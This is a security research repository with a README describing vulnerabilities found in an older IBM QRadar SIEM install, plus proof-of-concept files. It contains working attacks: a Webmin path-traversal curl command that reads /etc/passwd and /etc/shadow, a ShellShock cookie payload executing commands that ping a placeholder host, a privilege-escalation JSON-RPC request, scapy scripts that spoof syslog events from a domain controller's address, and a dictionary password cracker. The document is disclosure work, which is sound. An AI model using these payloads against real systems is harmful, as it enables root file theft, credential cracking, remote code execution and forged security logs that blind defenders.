├── PoCs ├── FILE_INCLUTION.sh ├── INJECT_EVENTS.py └── PE_AUTHENTICATED_USER.http ├── README.md ├── _config.yml ├── crypt_test.py ├── reply_event.py └── scapy_send.py /PoCs/FILE_INCLUTION.sh: -------------------------------------------------------------------------------- 1 | curl --sslv3 -k -v -d https://192.168.1.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd 2 | -------------------------------------------------------------------------------- /PoCs/INJECT_EVENTS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys 4 | import time 5 | import random 6 | import socket 7 | import logging 8 | import datetime 9 | 10 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 11 | 12 | from scapy.all import * 13 | 14 | # Globals 15 | SIEM_IP = "192.168.1.1" 16 | SIEM_UDP_PORT = 514 17 | 18 | 19 | def _FormPacketPayload(source_ip, source_hostname, kind, user, port=123, original_host="Scarry!"): 20 | months_arr = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'] 21 | 22 | now = datetime.now() 23 | day = "%02d" % (now.day,) 24 | month = "%02d" % (now.month,) 25 | hour = "%02d" % (now.hour,) 26 | minute = "%02d" % (now.minute,) 27 | second = "%02d" % (now.second,) 28 | date_formatted = "%s-%s-%s" % (now.year, month, day) 29 | time_formatted = "%s:%s:%s" % (hour, minute, second) 30 | epoch_time = str(int(time.time())) 31 | month_name_short = months_arr[int(month)] 32 | 33 | # Test Params 34 | user_name = user 35 | event_id = str(4776) 36 | 37 | raw_test = "<13>%s %s %s %s AgentDevice=WindowsLog\tAgentLogFile=Security\tPluginVersion=1.0.14\tSource=Microsoft-Windows-Security-Auditing\tComputer=%s\tUser= \tDomain= \tEventID=4776\tEventIDCode=4776\tEventType=8\tEventCategory=14336\tRecordNumber=357588878\tTimeGenerated=%s\tTimeWritten=%s\tMessage=The computer attempted to validate the credentials for an account. Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 Logon Account: %s Source Workstation: %s Error Code: 0x0 " % (month_name_short, day, time_formatted, source_hostname[1], source_hostname[0], epoch_time, epoch_time, user_name, original_host) 38 | 39 | return raw_test 40 | 41 | def _buildIP(src, dst): 42 | a = IP( 43 | src=src, 44 | dst=dst 45 | ) 46 | return a 47 | 48 | def _UDP(ip, dst_port, src_port=0): 49 | if src_port == 0: 50 | src_port = random.randint(5000,50000) 51 | b = ip/UDP(sport=src_port, dport=dst_port) 52 | return b 53 | 54 | def _AddPayload(packet, payload): 55 | return packet / Raw(load=payload) 56 | 57 | def _Send(packet, times, delay): 58 | for i in range(0,times): 59 | send(packet) 60 | time.sleep(delay) 61 | 62 | if __name__ == "__main__": 63 | DELIVERING_SERVER = ("main_dc.local", "192.168.1.100") 64 | SOURCE_IP = DELIVERING_SERVER[1] 65 | 66 | counter = 1 67 | 68 | user = "goodall" 69 | 70 | # Create a payload for user authentication success 71 | src_port = 1234 72 | payload = _FormPacketPayload( source_ip=SOURCE_IP, 73 | source_hostname=DELIVERING_SERVER, 74 | kind=4, 75 | port=src_port, 76 | user=user, 77 | original_host=DELIVERING_SERVER[0] 78 | ) 79 | 80 | pcket = _buildIP(src=SOURCE_IP, dst=SIEM_IP) 81 | udp = _UDP(ip=pcket, dst_port=SIEM_UDP_PORT, src_port=src_port) 82 | last = _AddPayload(packet=udp, payload=payload) 83 | _Send(last, times=counter, delay=0.2) 84 | -------------------------------------------------------------------------------- /PoCs/PE_AUTHENTICATED_USER.http: -------------------------------------------------------------------------------- 1 | POST /console/JSON-RPC/QRadar.saveUserPreferences HTTP/1.1 2 | Host: 192.168.1.1 3 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0 4 | Accept: */* 5 | Accept-Language: en-US,en;q=0.5 6 | Accept-Encoding: gzip, deflate, br 7 | Referer: https://192.168.1.1/console/qradar/jsp/QRadar.jsp 8 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 9 | Content-Length: 391 10 | Cookie: JSESSIONID=72[trimmed]EC; SEC=32[trimmed]94 11 | Connection: close 12 | 13 | {method:"QRadar.saveUserPreferences",params:{"userJSON":{"id":"1","username":"admin","email":"my_personal_email@morirt.com","description":"","password":"123546","passwordConfirm":"123456","roleId":null,"spId":null,"validationErrors":{},"roleName":"","securityProfileName":"","locale":"en","timezone":null,"DISPLAY_NOTIFICATION_POPUPS":true}},sessionId:"32[trimmed]94",id:"875"} 14 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Polarising Pine 2 | 3 | ## Abstract 4 | 5 | This document and research was conducted after an interesting coincidence. A while back i was installing a new server and had requested a colleague of mine on how i might add this new server as a log source to our SIEM for monitoring. Expecting an agent or an elaborate set of instructions and key-exchange procedures i was surprised at learning that in order to be a log source on our SIEM, all you need to do is refer the syslog-ng service to the correct IP. 6 | 7 | This was a great surprise to me as i had expected that in order to input data into what is one of the most sensitive apparatuses of our organization you would need some sort of identification and presumably, authorization. I was at least expecting some “Approve” button on the system alerting the existence of a new log source. 8 | 9 | This prompted my curiosity. So after i validated that adding a log source does work in the way he mentioned, i went on to formulate some questions regarding that system to see what else i can understand regarding its operation. These will be the questions driving the research. 10 | 11 | 1. Does the SIEM automatically accept any device as a log source? 12 | 1. If there is no identification or authorization, how does the SIEM validate the authenticity of the data it receives and parses? 13 | 1. Can such a mechanism by circumvented? 14 | 1. Is it feasible create new events from a new log source? 15 | 1. Is it feasible to falsify new events from an existing log source (impersonation) ? 16 | 1. Is it feasible to falsify previous logs from an existing log source (impersonation) ? 17 | 1. Is it feasible to trigger alerting mechanism on events which had been injected into the system by falsifying data? 18 | 1. What security mechanism are in place on the OS level? 19 | 1. Which security mechanism are deployed on the interface level? 20 | 1. And mainly, is the SIEM system secure? 21 | 22 | With these questions in mind a research was initiated into the SIEM system in an attempt to understand its operation and security mechanism. 23 | 24 | It is critical to remember that these vulnerabilities have been tested on a relatively old version of the product. Most of the vulnerabilities described below are not applicable to the latest version. 25 | 26 | ## Methodology 27 | 28 | ### Events and Log Sources Research 29 | 30 | As part of the research process, the key point would be to understand the mechanism in which the systems operate and make decisions. In this case i've started by understanding which protocols for a log source are supported, how the system registers them and what kind of analysis is being made on that raw data. 31 | 32 | By default, the SIEM supports various types of log sources whilst the easiest one to setup and by far the most common one is syslog. We have started by understanding that the SIEM accepts connections for syslog on 514/udp and 5140/tcp. We have chosen to start understanding the UDP mechanism as it is easier to tamper with than the opponent, TCP. So the first start was to create a UDP listener on the SIEM to create a PCAP with some of that data. 33 | 34 | ```bash 35 | tcpdump -i eth0 udp port 514 -c 1000 -w capture.cap 36 | ``` 37 | 38 | Since everything on the SIEM is running as `root` (a promising sign indeed) we did not need to add `sudo`. The `-i eth0` is meant to restrict the capturing only to the correct adapter while `udp port 514` will only listen on the designated port and `-c 1000` will capture up to 1000 packets, as this is a live SIEM getting hundreds of events per second. 39 | 40 | When we have analyzed the packet capture we've seen something which can only be described as text-book-example syslog packets. No appended headers, trinkets or footers. The following text is a simple tab (‘\t') separated text which looks something like this: 41 | 42 | ``` 43 | Jan 1 11:11:11 192.168.1.1 AgentDevice=WindowsLog AgentLogFile=Security PluginVersion=1.0.14 Source=Microsoft-Windows-Security-Auditing Computer=main_dc User= Domain= EventID=4776 EventIDCode=4776 EventType=8 EventCategory=14336 RecordNumber=1089190650 TimeGenerated=111111111111 TimeWritten=111111111111 Message=The computer attempted to validate the credentials for an account. Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 Logon Account: admin Source Workstation: main_dc Error Code: 0x0 44 | ``` 45 | 46 | Of course the names and IPs have been altered. 47 | So the next step was to broadcast the same packet again and see if it is being accepted. This was done with a quick and dirty python script you can find as `reply_event.py`. 48 | 49 | And lo and behold, a new event was created in the SIEM with those details. It took us some time to find it as we were looking for a new log source while that failed to appear. Apparently, the SIEM only writes that the event was reported by an IP but places the event as the log source of which the name appears in . As an example, this message was sent from an IP different to the one of the DC but the SIEM added the event under the DC because the host name in the raw data of the UDP packet pointed to it while logging in the details in the event that the event was reported by my IP. 50 | 51 | Next step was to see what will happen if the same packet would be sent from the same IP as the one of the DC server itself. For that scapy became very handy as you can see in `scapy_send.py`. 52 | 53 | And again, the SIEM had accepted this input as genuine but this time even the originating IP is the one of the DC. So in terms of looking even at the raw event data, the operator has no way of differentiating between this event and a real one. 54 | 55 | **PoC I - Injecting False Events** 56 | 57 | Next step was to buff it up to a level of a working code which is easy to modify and inject false events into the SIEM. So here you have `INJECT_EVENTS.py`. This is critical as `syslog` protocol is enabled by default so event if an organization is not working with `syslog` they will need to remember to disable it manually on the system. 58 | 59 | ### OS Research 60 | 61 | In terms of OS research, even though root access to the machine was granted, a method of remote, as well as local research was chosen. To enable both what a hacker will see as well as getting full details of the system. 62 | Nmap seemed like a good start remotely: 63 | 64 | ``` 65 | [root@machine /]# nmap -sV -O -A -p1-65000 192.168.1.1 66 | 67 | Starting Nmap 5.51 ( http://nmap.org ) at 2017-06-30 09:29 AST 68 | Nmap scan report for siem.local (192.168.1.1) 69 | Host is up (0.000032s latency). 70 | Not shown: 64960 closed ports 71 | PORT STATE SERVICE VERSION 72 | 22/tcp open ssh OpenSSH 5.3 (protocol 2.0) 73 | | ssh-hostkey: 1024 0a:[trimmed]:e4 (DSA) 74 | |_2048 10:[trimmed]:e5 (RSA) 75 | 37/tcp open time? 76 | 111/tcp open rpcbind 77 | 443/tcp open ssl/http Apache httpd 78 | |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 79 | 514/tcp open shell? 80 | 1514/tcp open unknown 81 | 4333/tcp open http Apache httpd 82 | |_http-title: Blocked 83 | |_http-favicon: 84 | 5432/tcp open postgresql PostgreSQL DB 85 | 7676/tcp open java-message-service Java Message Service 4.4 Update 1 86 | 7677/tcp open unknown 87 | 7777/tcp open cbt? 88 | 7778/tcp open interwise? 89 | 7779/tcp open unknown 90 | 7780/tcp open unknown 91 | 7781/tcp open unknown 92 | 7782/tcp open unknown 93 | 7790/tcp open unknown 94 | 7791/tcp open unknown 95 | 7793/tcp open unknown 96 | 7799/tcp open unknown 97 | 7800/tcp open asr? 98 | 7801/tcp open unknown 99 | 7803/tcp open unknown 100 | 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 101 | 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 102 | |_http-title: Apache Tomcat 103 | |_http-favicon: Apache Tomcat 104 | | http-methods: Potentially risky methods: PUT DELETE 105 | |_See http://nmap.org/nsedoc/scripts/http-methods.html 106 | |_http-open-proxy: Proxy might be redirecting requests 107 | 10000/tcp open http MiniServ 0.01 (Webmin httpd) 108 | |_http-methods: No Allow or Public header in OPTIONS response (status code 200) 109 | 15433/tcp open postgresql PostgreSQL DB 110 | 23333/tcp open unknown 111 | 32005/tcp open unknown 112 | 32009/tcp open unknown 113 | 32010/tcp open unknown 114 | 32011/tcp open unknown 115 | 34570/tcp open unknown 116 | 34571/tcp open unknown 117 | 34572/tcp open http Adaptec Storage Manager Agent httpd 118 | |_http-methods: No Allow or Public header in OPTIONS response (status code 501) 119 | |_http-title: %APPLICATION% 120 | 34573/tcp open ssl/unknown 121 | 50915/tcp open unknown 122 | 50978/tcp open unknown 123 | 54165/tcp open unknown 124 | 57290/tcp open unknown 125 | 3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : 126 | ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== 127 | SF-Port37-TCP:V=5.51%I=7%D=6/30%Time=5955EFB3%P=x86_64-redhat-linux-gnu%r( 128 | SF:NULL,4,"\xdd\0n3"); 129 | ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== 130 | SF-Port5432-TCP:V=5.51%I=[...trimmed...]; 131 | ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== 132 | SF-Port15433-TCP:V=5.51%I=[...trimmed...]; 133 | No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ). 134 | TCP/IP fingerprint: 135 | OS:SCAN(V=5.51%D=6/30%OT=[...trimmed...]) 136 | ``` 137 | 138 | As you can see, it's not that the attack surface was comprehensive but rather overwhelming. With expectations to find some services we can play around with, we have found almost all of them in an overwhelming abundance. 139 | 140 | First one that jumped to the start of the list was port 10000/tcp registered as ‘webmin'. A quick search gives us several vulnerabilities. We have attempted one straight off the page and found it to fail. Reason: SSL Handshake Failed. After some tests we found that the service uses an SSL version which is just not supported. Tweaking the `curl` command line a bit got us: 141 | 142 | **PoC II - Remote File Inclusion with root Access** 143 | 144 | ``` 145 | curl --sslv3 -k -v -d https://192.168.1.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd 146 | ``` 147 | 148 | Which surprised us by simply coughing up `/etc/passwd`. So we went a step bolder and requested, kindly of course, for the `/etc/shadow` file. The service was kind enough to oblige. 149 | At this point we've decided to look into the patching levels of the machine as the kernel seemed ‘a bit' outdated. We have listed in our notes that the system is vulnerable to ShellShock. We shall address that on the Web Admin Interface Research. 150 | 151 | #### Hardcoded Credentials with weak Storage 152 | 153 | So we figured out that the several files holding the username `configservices` which were interesting for us: 154 | ``` 155 | /opt/qradar/conf/templates/users.conf 156 | /opt/qradar/conf/templates/configservices_users.conf 157 | /opt/qradar/conf/users.conf 158 | /opt/qradar/conf/configservices_users.conf 159 | ``` 160 | 161 | The file `/opt/qradar/conf/configservices_users.conf` holds credentials stored with `crypt`. So we've wrote a little script to 'bruteforce' and check the passwords with some of the several most common dictionaries. 162 | 163 | ```python 164 | import crypt 165 | 166 | def login(pass2check, digest): 167 | username = "admin" 168 | cleartext = pass2check 169 | cryptedpasswd = digest 170 | return crypt.crypt(cleartext, cryptedpasswd) == cryptedpasswd 171 | 172 | passwords = ["AGuocsnOEaHlw", "/wEPae8TzCqmM"] 173 | words = open('10_million_password_list_top_1000000.txt', 'r').readlines() 174 | words = open('darkc0de.lst', 'r').readlines() 175 | words = open('rockyou.txt', 'r').readlines() 176 | 177 | 178 | for password in passwords: 179 | for word in words: 180 | if login(word.strip(), password): 181 | print word.strip(),":", password 182 | ``` 183 | 184 | Biggest issue for us that the user `admin` holds the password `initial`. 185 | 186 | 187 | ### Web Admin Interface Research 188 | 189 | #### Hardcoded root User 190 | 191 | When you thought things cannot really get worse… 192 | Exclaiming to my friend that the web interface is usually guarded and amongst those, the authentication features are heavily scrutinised so finding anything in there would be highly unlikely, i could not have been more wrong. 193 | A simple ‘View Source' of the login page returned this: 194 | 195 | ```html 196 | 209 | ``` 210 | 211 | At this point i seriously started pondering the existence of a honeypot. So having a look at the configuration file for the users on the SIEM at `/opt/qradar/conf/users.conf` and `/opt/qradar/conf/configservices_users.conf`, which can be acquired by the previous issue we found the user. This removed the fear for a honeypot as no one in thier right mind will create a honeypot user with a password. Some password cracking for the hash there yielded that the plain text of the ‘military grade encryption' was set to `HIDDEN`. Commenting out the JavaScript "blockings" in the Web UI we logged in just fine. This user is an Administrative user on the UI and is hidden from other operators or Administrators. 212 | 213 | **The password is not really HIDDEN but since we deem this as extremly dangerous as the user is hardcoded and does not appear in any Admin UI and there seems to be no way of changing it except for in that particular file we have chosen for now to omit the actual password.** 214 | 215 | #### Exploit Reuse - ShellShock 216 | 217 | Reaching far back to the past to when we discovered the vulnerability of the system to ShellShock we were determined to check whether this can really be exploited remotely or "just" a locally exploitable vulnerability. 218 | 219 | **PoC III - ShellShock Code Execution** 220 | 221 | ``` 222 | POST /console/config/config.cgi HTTP/1.1 223 | Host: 192.168.1.1 224 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:40.0) Gecko/20100101 Firefox/40.0 225 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 226 | Accept-Language: en-US,en;q=0.5 227 | Accept-Encoding: gzip, deflate 228 | Referer: https://192.168.1.1/console/do/qradar/rightadminconsole?appName=qradar&pageId=allTabs 229 | Cookie: JSESSIONID=60[trimmed1BF; SEC=3e[trimmed1a6; () { :;}; echo COKKIE=SHELLY ; echo ; ping -c 5 MY_IP 230 | Connection: close 231 | Content-Type: application/x-www-form-urlencoded 232 | Content-Length: 101 233 | 234 | configarea=remoteservices&viewconf=staging%2Fglobalconfig&stoken=89[trimmed]18 235 | ``` 236 | 237 | And another ‘lo and behold' as Wireshark registers pings coming into my system from the SIEM! Just a reminder: all services under the SIEM are running at ‘root'. It is important to notice that in the new system which we have checked 'ShellShock' had been patched and this does not exist. 238 | 239 | #### Privilege Escalation 240 | 241 | Next step was to see if users' privileges are being regulated properly. Another user was created as an ordinary user which should be restricted. An attempt to alter other users' privileges or details failed. The SIEM had verified the privileges of the user and blocked the attempt. However, there was another form at the top of the toolbar to edit the user that was created. That form did not go through the entire ordeal of verifying the user's privileges as it was only supposed to change the user which it was on. The issue is that the system did not verify that by the cookies and authentication that was done but rather through the details in the form itself. 242 | 243 | **PoC IV - Privilege Escalation via Authenticated User** 244 | 245 | ```json 246 | POST /console/JSON-RPC/QRadar.saveUserPreferences HTTP/1.1 247 | Host: 192.168.1.1 248 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0 249 | Accept: */* 250 | Accept-Language: en-US,en;q=0.5 251 | Accept-Encoding: gzip, deflate, br 252 | Referer: https://192.168.1.1/console/qradar/jsp/QRadar.jsp 253 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 254 | Content-Length: 391 255 | Cookie: JSESSIONID=72[trimmed]EC; SEC=32[trimmed]94 256 | Connection: close 257 | 258 | {method:"QRadar.saveUserPreferences",params:{"userJSON":{"id":"1","username":"admin","email":"my_personal_email@morirt.com","description":"","password":"123546","passwordConfirm":"123456","roleId":null,"spId":null,"validationErrors":{},"roleName":"","securityProfileName":"","locale":"en","timezone":null,"DISPLAY_NOTIFICATION_POPUPS":true}},sessionId:"32[trimmed]94",id:"875"} 259 | ``` 260 | 261 | And the answer was 'why not...'. 262 | 263 | ```json 264 | HTTP/1.1 200 OK 265 | Date: Wed, 28 Jun 2017 09:16:07 GMT 266 | Pragma: no-cache 267 | Cache-Control: must-revalidate 268 | Cache-Control: no-cache 269 | Cache-Control: no-store 270 | Expires: Thu, 01 Jan 1970 00:00:00 GMT 271 | Content-Type: UTF-8;charset=UTF-8 272 | Connection: close 273 | Content-Length: 124 274 | 275 | {"id":"875","result":{"message":null,"id":null,"success":true,"validationErrors":null,"serializedObject":null},"error":null} 276 | 277 | ``` 278 | 279 | #### Default Page 280 | 281 | This page discloses the use of apache on a Red Hat at `https://ip/.noindex.html`. 282 | 283 | 284 | ## Summary 285 | 286 | Generally speaking, a SIEM is a good idea and a must-have for every competent security team or every organization who takes their security seriously. IBM is a leading provider for such a tool with a lot of functionality and capabilities. How ever, there are lessons to be learned from purchasing a company and building up on their product. Although we have seem major and significant improvements in term of security of the latest versions there is still a lot to be done. 287 | -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-dinky -------------------------------------------------------------------------------- /crypt_test.py: -------------------------------------------------------------------------------- 1 | import crypt, getpass, pwd 2 | 3 | def login(pass2check, digest): 4 | cleartext = pass2check 5 | cryptedpasswd = digest 6 | return crypt.crypt(cleartext, cryptedpasswd) == cryptedpasswd 7 | 8 | passwords = ["XXX", "XXX"] 9 | words = open('10_million_password_list_top_1000000.txt', 'r').readlines() 10 | words = open('darkc0de.lst', 'r').readlines() 11 | words = open('rockyou.txt', 'r').readlines() 12 | 13 | 14 | for password in passwords: 15 | for word in words: 16 | if login(word.strip(), password): 17 | print word.strip(),":", password 18 | -------------------------------------------------------------------------------- /reply_event.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | 5 | SIEM_ADDR = "192.168.1.2" 6 | SIEM_PORT = 514 7 | 8 | data = """Jan 1 11:11:11 192.168.1.1 AgentDevice=WindowsLog AgentLogFile=Security PluginVersion=1.0.14 Source=Microsoft-Windows-Security-Auditing Computer=main_dc User= Domain= EventID=4776 EventIDCode=4776 EventType=8 EventCategory=14336 RecordNumber=1089190650 TimeGenerated=111111111111 TimeWritten=111111111111 Message=The computer attempted to validate the credentials for an account. Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 Logon Account: admin Source Workstation: main_dc Error Code: 0x0"""" 9 | 10 | try: 11 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 12 | sent = sock.sendto(data, (SIEM_ADDR, SIEM_PORT)) 13 | except socket.error, e: 14 | sys.stderr.write("Error: %s.\n" % str(e)) 15 | sys.exit() 16 | finally: 17 | sock.close() 18 | sys.stdout.write("Done.\n") 19 | -------------------------------------------------------------------------------- /scapy_send.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from scapy.all import * 4 | 5 | SIEM_ADDR = "192.168.1.2" 6 | SIEM_PORT = 514 7 | 8 | DC_ADDR = "192.168.1.100" 9 | DC_PORT = 9191 10 | 11 | data = """Jan 1 11:11:11 192.168.1.1 AgentDevice=WindowsLog\tAgentLogFile=Security\tPluginVersion=1.0.14\tSource=Microsoft-Windows-Security-Auditing\tComputer=main_dc\tUser= \tDomain= \tEventID=4776\tEventIDCode=4776\tEventType=8\tEventCategory=14336\tRecordNumber=1089190650\tTimeGenerated=111111111111\tTimeWritten=111111111111\tMessage=The computer attempted to validate the credentials for an account. Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 Logon Account: admin Source Workstation: main_dc Error Code: 0x0"""" 12 | 13 | ip = IP(dst=SIEM_ADDR, src=DC_ADDR) 14 | udp = ip/UDP(dport=SIEM_PORT, sport=DC_PORT) 15 | final = udp/Raw(load=data) 16 | send(final) 17 | --------------------------------------------------------------------------------